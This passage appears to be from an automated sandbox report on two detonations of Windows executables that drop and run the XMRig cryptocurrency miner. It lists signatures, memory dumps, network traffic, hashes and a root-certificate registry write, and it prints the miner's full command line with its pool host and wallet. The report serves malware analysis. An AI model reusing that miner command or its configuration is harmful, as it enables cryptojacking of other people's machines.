memory/932-68-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-69-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-70-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-71-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-72-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-73-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-74-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-75-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-76-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-77-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-78-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-79-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-80-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-81-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-82-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-83-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
memory/932-84-0x00007FF6DF0F0000-0x00007FF6DFBF3000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 20:01
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3984 wrote to memory of 3180 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3984 wrote to memory of 3180 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3180-16-0x000002A017E20000-0x000002A017E40000-memory.dmp
memory/3180-17-0x000002A019610000-0x000002A019630000-memory.dmp
memory/3180-18-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-19-0x000002A019630000-0x000002A019650000-memory.dmp
memory/3180-20-0x000002A019650000-0x000002A019670000-memory.dmp
memory/3180-21-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-22-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-24-0x000002A019630000-0x000002A019650000-memory.dmp
memory/3180-23-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-25-0x000002A019650000-0x000002A019670000-memory.dmp
memory/3180-26-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-27-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-28-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-29-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-30-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-31-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-32-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-33-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-34-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-35-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-36-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-37-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-38-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-39-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-40-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-41-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-42-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-43-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-44-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-45-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-46-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-47-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-48-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-49-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-50-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-51-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-52-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-53-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-54-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-55-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-56-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-57-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-58-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-59-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-60-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-61-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-62-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-63-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-64-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-65-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-66-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-67-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-68-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-69-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-70-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-71-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-72-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-73-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-74-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-75-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-76-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-77-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-78-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-79-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-80-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-81-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-82-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-83-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
memory/3180-84-0x00007FF6B0B40000-0x00007FF6B1643000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 20:01
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1797s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 856 wrote to memory of 2084 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 856 wrote to memory of 2084 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.167.79.40.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2084-16-0x000001A200A00000-0x000001A200A20000-memory.dmp
memory/2084-17-0x000001A294670000-0x000001A294690000-memory.dmp
memory/2084-18-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-19-0x000001A294AC0000-0x000001A294AE0000-memory.dmp
memory/2084-20-0x000001A294D00000-0x000001A294D20000-memory.dmp
memory/2084-21-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-22-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-23-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-24-0x000001A294AC0000-0x000001A294AE0000-memory.dmp
memory/2084-25-0x000001A294D00000-0x000001A294D20000-memory.dmp
memory/2084-26-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-27-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-28-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-29-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-30-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-31-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-32-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-33-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-34-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-35-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-36-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-37-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-38-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-39-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-40-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-41-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-42-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-43-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-44-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-45-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-46-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-47-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-48-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-49-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-50-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-51-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-52-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-53-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-54-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
